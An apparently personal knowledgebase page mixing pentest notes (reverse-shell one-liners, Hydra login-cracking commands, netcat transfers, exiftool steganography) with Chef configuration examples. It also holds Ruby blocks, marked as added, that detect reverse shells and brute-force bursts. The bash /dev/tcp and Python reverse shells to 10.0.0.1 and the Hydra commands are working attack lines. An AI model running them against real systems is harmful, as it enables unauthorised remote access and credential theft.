Tikejhya: Ashish Nepal

Knowledgebase

Category: Linux (Page 1 of 30)

reverse shell


Bash

Some versions of bash can send you a reverse shell (this was tested on Ubuntu 10.10):

bash -i >& /dev/tcp/10.0.0.1/8080 0>&1

Python

This was tested under Linux / Python 2.7:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

Ref: http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
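The defender's side of the two one-liners above, as an added example that is not from the post or from the pentestmonkey cheat sheet it cites: a small Ruby matcher that flags those two command-line shapes in a list of process command lines (ps output, or auditd EXECVE records joined back into one string), the kind of check a host-based detection rule performs. The rule names and the sample command lines are constructed for the example.

```ruby
# Added example (not from the post): match the two reverse-shell command
# shapes shown above in a list of process command lines.
REVERSE_SHELL_RULES = {
  # interactive bash whose stdin/stdout are redirected to its /dev/tcp pseudo-device
  'bash-dev-tcp' => %r{\bbash\b.*\s-i\b.*/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+},
  # python one-liner that opens a socket, connects, and dup2()s it over a std fd
  'python-socket-dup2' => /\bpython[\d.]*\b.*socket\.socket\(.*\.connect\(.*os\.dup2\(/
}.freeze

# Returns [[rule_name, cmdline], ...] for every command line that matches a rule.
def reverse_shell_matches(cmdlines)
  cmdlines.flat_map do |line|
    REVERSE_SHELL_RULES.select { |_, re| line.match?(re) }.keys.map { |rule| [rule, line] }
  end
end

# Constructed sample: the two lines from the cheat sheet above plus three benign ones.
SAMPLE_CMDLINES = [
  'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1',
  %q{python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'},
  'bash -i',                                                                  # plain interactive shell
  %q{python -c 'import socket; socket.create_connection(("10.0.0.1", 25))'},  # connects, no fd juggling
  '/usr/sbin/sshd -D'
].freeze

if __FILE__ == $PROGRAM_NAME
  reverse_shell_matches(SAMPLE_CMDLINES).each { |rule, line| puts "#{rule}: #{line}" }
end
```

The python rule deliberately requires all three of `socket.socket(`, `.connect(` and `os.dup2(` on one command line: a script that merely opens a connection is normal, and it is the duplication of the socket over file descriptors 0, 1 and 2 that makes it a shell.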

steganography & exiftool


Using steganography, secret messages can be embedded into images.

Using exiftool to find a base64-encoded message hidden in the image metadata:

apt install libimage-exiftool-perl
exiftool /tmp/for-007.jpg
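The same check done by hand, as an added example that is not from the post and not exiftool's own code: a small Ruby JPEG segment walker that pulls the COM and APPn metadata segments out of a file (where the Comment, EXIF and XMP tags exiftool prints live), then decodes any base64-looking run found in them. The JPEG skeleton and the hidden message are constructed inside the block.

```ruby
require 'base64'

# Added example (not from the post). Build a minimal JPEG skeleton:
# SOI, one COM segment carrying the given text, EOI. Constructed sample.
def jpeg_with_comment(comment)
  seg = "\xFF\xFE".b + [comment.bytesize + 2].pack('n') + comment.b
  "\xFF\xD8".b + seg + "\xFF\xD9".b
end

SAMPLE_JPEG = jpeg_with_comment("Comment: #{Base64.strict_encode64('meet at the usual place at 7')}")

# Walk the marker segments that precede the image data and return
# [marker, payload] for COM (0xFE) and APPn (0xE0..0xEF) segments.
# Stops at SOS (0xDA) or EOI (0xD9): after SOS only entropy-coded data follows.
def jpeg_metadata_segments(data)
  raise ArgumentError, 'not a JPEG (missing SOI)' unless data.byteslice(0, 2) == "\xFF\xD8".b
  segments = []
  pos = 2
  while pos + 4 <= data.bytesize
    raise ArgumentError, "expected marker at offset #{pos}" unless data.getbyte(pos) == 0xFF
    marker = data.getbyte(pos + 1)
    break if [0xD9, 0xDA].include?(marker)
    length = data.byteslice(pos + 2, 2).unpack1('n')      # big-endian, includes the 2 length bytes
    payload = data.byteslice(pos + 4, length - 2)
    segments << [marker, payload] if marker == 0xFE || (0xE0..0xEF).cover?(marker)
    pos += 2 + length
  end
  segments
end

# A run of base64 alphabet characters long enough not to be a word.
B64_RUN = %r{[A-Za-z0-9+/]{16,}={0,2}}

# Returns [[marker_hex, decoded_text], ...] for every base64 run that decodes
# to printable ASCII; other runs (binary EXIF blobs, random strings) are skipped.
def hidden_base64_strings(data)
  jpeg_metadata_segments(data).flat_map do |marker, payload|
    payload.scan(B64_RUN).filter_map do |token|
      begin
        decoded = Base64.strict_decode64(token)
      rescue ArgumentError
        next
      end
      next unless decoded.bytes.all? { |b| (32..126).cover?(b) || [9, 10, 13].include?(b) }
      [format('0x%02X', marker), decoded]
    end
  end
end

if __FILE__ == $PROGRAM_NAME
  data = ARGV[0] ? File.binread(ARGV[0]) : SAMPLE_JPEG
  hidden_base64_strings(data).each { |marker, text| puts "#{marker}: #{text}" }
end
```

Run it with a path argument to scan a real file; without one it scans the constructed sample. Real EXIF and XMP payloads contain plenty of base64-shaped runs (thumbnails, colour profiles), which is why the decoded bytes are required to be printable before anything is reported.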


hydra [by example]


hydra -L Boris -P /usr/share/wordlists/fasttrack.txt -t20 172.28.128.3 -s55007 -I pop3

Hydra is a parallelized login cracker that supports numerous protocols.

Examples:
hydra -l user -P passlist.txt ftp://192.168.0.1
hydra -L userlist.txt -p defaultpw imap://192.168.0.1/PLAIN
hydra -C defaults.txt -6 pop3s://[2001:db8::1]:143/TLS:DIGEST-MD5
hydra -l admin -p password ftp://[192.168.0.0/24]/
hydra -L logins.txt -P pws.txt -M targets.txt ssh
hydra 172.28.128.5 http-post-form "/path/index.php:key=^PASS^:invalid key" -l username -P /usr/share/dict/words -t 10 -w 30 -o hydra-http-post-attack.txt

Quick tip: to send both a user name and a password, the form string takes two fields: "/path/index.php:user=^USER^&pass=^PASS^:Bad login"

Breaking the command down:

Host = 172.28.128.5
Method = http-form-post
URL = /path/index.php
Form parameters = key=^PASS^
Failure response = invalid key
Users file = users.txt
Password file = /usr/share/dict/words
Threads = -t 10
Wait for timeout = -w 30
Output file = -o hydra-http-post-attack.txt
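The defender's view of the same activity, as an added Ruby example that is not from the post or from Hydra: a scan of sshd auth-log lines for the burst of failed logins a parallelized cracker produces, counting failures per source address inside a sliding time window. The log excerpt, the threshold and the window length are constructed for the example.

```ruby
require 'time'

# Added example (not from the post): find sources producing bursts of failed
# sshd logins. Log format is the usual syslog auth.log line (constructed sample).
FAILED_LOGIN = /\A(?<ts>\w{3}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: Failed password for (?:invalid user )?(?<user>\S+) from (?<src>\S+) port \d+/

SAMPLE_AUTH_LOG = <<~'LOG'
  Mar  3 10:15:01 mail sshd[4242]: Failed password for invalid user boris from 172.28.128.9 port 51000 ssh2
  Mar  3 10:15:03 mail sshd[4244]: Failed password for invalid user boris from 172.28.128.9 port 51002 ssh2
  Mar  3 10:15:05 mail sshd[4246]: Failed password for root from 172.28.128.9 port 51004 ssh2
  Mar  3 10:15:07 mail sshd[4248]: Failed password for root from 172.28.128.9 port 51006 ssh2
  Mar  3 10:15:09 mail sshd[4250]: Failed password for invalid user admin from 172.28.128.9 port 51008 ssh2
  Mar  3 10:15:11 mail sshd[4252]: Failed password for invalid user admin from 172.28.128.9 port 51010 ssh2
  Mar  3 10:16:40 mail sshd[4260]: Failed password for ashish from 10.0.0.5 port 40100 ssh2
  Mar  3 10:16:52 mail sshd[4260]: Accepted password for ashish from 10.0.0.5 port 40100 ssh2
LOG

# Returns { src => { failures_in_window:, users: } } for every source that
# produced at least `threshold` failures inside any `window_seconds` span.
def brute_force_sources(log_text, threshold: 5, window_seconds: 60)
  events = Hash.new { |h, k| h[k] = [] }
  log_text.each_line do |line|
    m = FAILED_LOGIN.match(line) or next
    # syslog timestamps carry no year; only the differences matter here
    t = Time.strptime(m[:ts].squeeze(' '), '%b %d %H:%M:%S')
    events[m[:src]] << [t, m[:user]]
  end

  flagged = {}
  events.each do |src, list|
    list.sort_by!(&:first)
    best = 0
    start = 0
    list.each_with_index do |(t, _), stop|        # sliding window over sorted timestamps
      start += 1 while t - list[start][0] > window_seconds
      best = [best, stop - start + 1].max
    end
    next if best < threshold
    flagged[src] = { failures_in_window: best, users: list.map(&:last).uniq.sort }
  end
  flagged
end

if __FILE__ == $PROGRAM_NAME
  text = ARGV[0] ? File.read(ARGV[0]) : SAMPLE_AUTH_LOG
  brute_force_sources(text).each do |src, info|
    puts "#{src}: #{info[:failures_in_window]} failures, users tried: #{info[:users].join(', ')}"
  end
end
```

Counting per source in a window rather than per user is what catches the `-L userlist` style run above, where each account sees only one or two attempts; the list of user names tried is kept because a spread across unrelated accounts from one address is itself a strong signal.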


Netcat

Netcat: test for an open port

nc -zv 192.168.1.15 22

In the command above, the flag:

  1. -z – sets nc to simply scan for listening daemons, without actually sending any data to them.
  2. -v – enables verbose mode.

Passing -u tests a UDP port instead.

Using Netcat for File Transfers

Receiver

nc -l -p 3334 > file

will begin listening on port 3334.

Sender

nc -w 3 [IP_of_destination] 3334 < file

Compression can be used too:

Receiver

nc -l -p 3334 | uncompress -c | tar xvfp -

Sender

tar cfp - /some/dir | compress -c | nc -w 3 [IP_of_destination] 3334

chef [rendering template]

filebeat:
  prospectors:
<% @rolename.each do |role| %>
  # Some prospector should be passed in here based on role
<%= render "filebeat-syslog.yaml.erb" -%>
<%= render "filebeat-#{role}.yaml.erb" -%>
<% end %>
  registry_file: <%= @path_registry %>

output:
  logstash:
    hosts: ["<%= node.filebeats.logstashhost %>:<%= node.filebeats.logstashport %>"]
    #tls:
    #  certificate_authorities: ["/etc/pki/tls/certs/beats.crt"]
    #  insecure: true

shipper:

logging:
  files:
    rotateeverybytes: 10485760 # = 10MB
# In the rendering above, the variables come from the recipe, which loads them from the attributes.

$ cat attributes/default.rb
default['filebeat']['apache_log_file'] = ['/var/log/httpd/*error_log', '/var/log/httpd/*access_log']

$ cat recipes/config.rb
rolename = node.roles

template '/etc/filebeat/filebeat.yml' do
  source 'filebeat-default.yaml.erb'
  mode '0440'
  owner 'root'
  group 'root'
  variables(
    path_apache_log_file: node['filebeat']['apache_log_file'],
    input_type: node['filebeat']['input_type'],
    document_type: node['filebeat']['document_type'],
    path_registry: node['filebeat']['registry'],
    rolename: rolename
  )
end

$ cat templates/default/filebeat-default.yaml.erb
(the filebeat-default.yaml.erb template shown at the top of this post)
$ cat templates/default/filebeat-magento.yaml.erb
<% @path_apache_log_file.each do |j| %>
    - paths:
        - <%= j %>
      input_type: <%= @input_type %>
<% if j =~ /error_log/ %>
      document_type: apache-error-log
<% else %>
      document_type: apache-access-log
<% end %>
      fields:
        service:
          zone: <%= @zone %>
<% end %>
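Rendering the magento prospector template outside Chef, as an added example that is not the cookbook's own code: the `@` template variables become plain locals passed through `ERB#result_with_hash`, and the rendered text is parsed straight back with YAML, so an indentation mistake in the template shows up as a parse error on the workstation instead of a filebeat start-up failure on the node. The log paths and the zone are constructed values.

```ruby
require 'erb'
require 'yaml'

# Added example (not the cookbook's template): stand-alone version of
# filebeat-magento.yaml.erb. Chef's @variables are plain locals here, and
# the <%- ... -%> tags (trim mode '-') drop the control lines from the output.
PROSPECTOR_TEMPLATE = <<~'ERB'
  filebeat:
    prospectors:
  <%- path_apache_log_file.each do |j| -%>
      - paths:
          - <%= j %>
        input_type: <%= input_type %>
  <%- if j =~ /error_log/ -%>
        document_type: apache-error-log
  <%- else -%>
        document_type: apache-access-log
  <%- end -%>
        fields:
          service:
            zone: <%= zone %>
  <%- end -%>
ERB

# Render the template and return the YAML text filebeat would read.
def render_prospectors(path_apache_log_file:, input_type:, zone:)
  ERB.new(PROSPECTOR_TEMPLATE, trim_mode: '-')
     .result_with_hash(path_apache_log_file: path_apache_log_file,
                       input_type: input_type, zone: zone)
end

# Render and parse back: a template whose indentation is off still renders,
# but the result is not valid YAML, and this is where that surfaces.
def load_prospectors(**kwargs)
  YAML.safe_load(render_prospectors(**kwargs))
end

if __FILE__ == $PROGRAM_NAME
  args = { path_apache_log_file: ['/var/log/httpd/ssl_error_log', '/var/log/httpd/ssl_access_log'], # constructed
           input_type: 'log', zone: 'eu-west' }
  puts render_prospectors(**args)
  puts "-> #{load_prospectors(**args)['filebeat']['prospectors'].length} prospectors parsed"
end
```

The same round trip is what a ChefSpec or kitchen-verify step should do for any template that produces YAML or JSON: render, then parse, rather than trusting that the file looks right.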

chef [templates]

template '/data/project/config.inc' do
  source 'config.inc.erb'
  variables(
    smtp_host: node['smtp']['host'],
    smtp_port: node['smtp']['port'],
    suffix: suffix
  )
  owner 'apache'
  group 'apache'
  mode '0744'
end

Chef [Cron]

cron 'job1' do
  minute '*/5'
  # cron runs the command under /bin/sh, where bash's "&>" is not portable
  command 'some command here > /dev/null 2>&1'
end

Chef Basics [attributes if else, loop ]

# replace: strip the node name down to its environment or host part
Ohai2u tikejhya@web1-prod1!
chef (12.14.89)> node.name.gsub(/.*-/, '')
=> "prod1"
chef (12.14.89)> node.name.gsub(/-.*/, '')
=> "web1"
chef (12.14.89)>

# array of packages to install
default['dep']['packages'] = %w(mysql php-pdo php-ldap php-gd php-pear httpd php-cli php-mysql php-xml php-mbstring php-pecl-memcache php-devel php-common php php-mcrypt php-pecl-apc php-soap vsftpd)

# mark the node as admin if its run list contains the admin role
default['admin'] = node.run_list?('role[admin]')

# if / else
if node['admin']
  default['php']['max_execution_time'] = 30
else
  default['php']['max_execution_time'] = 180
end

# case statement with a loop
case node.chef_environment
when 'prod'
  default['nfs']['nfs_mount_point'] = '/data/en-UK/media'
when 'prod2'
  default['nfs']['nfs_mount_point'] = '/data/en-UK/media/files'
when 'prod3'
  %w(en-UK de-DE es-ES).each do |sites|
    default[sites]['efs_mount_point'] = "/data/#{sites}/media/efs-files"
    default[sites]['nfs_mount_point'] = "/data/#{sites}/media/nfs-files"
    default[sites]['app_mount_point'] = "/data/#{sites}/media/files"
  end
end

Chef [data bags]

# Chef: using a data bag value

# Let's look at the item "webserver" in the data bag "staging"
$ knife data bag show staging webserver
mysql:
  hostname: db1.tikeweb.com
  username: admin

# load the data bag item into a variable
config = Chef::DataBagItem.load('staging', 'webserver')

# copy the mysql hostname into a node attribute
node.default['mysql-hostname'] = config['mysql']['hostname']
# or, only if nothing has set it yet:
node.default_unless['mysql-hostname'] = config['mysql']['hostname']

# This can now be used as a variable inside the recipe, e.g. passed to a template.

Chef Basics [chef-client]

# run chef-client with an override run list, so only this recipe is applied
chef-client -o 'recipe[filebeats]'
chef-client -o 'recipe[filebeats]' -l debug

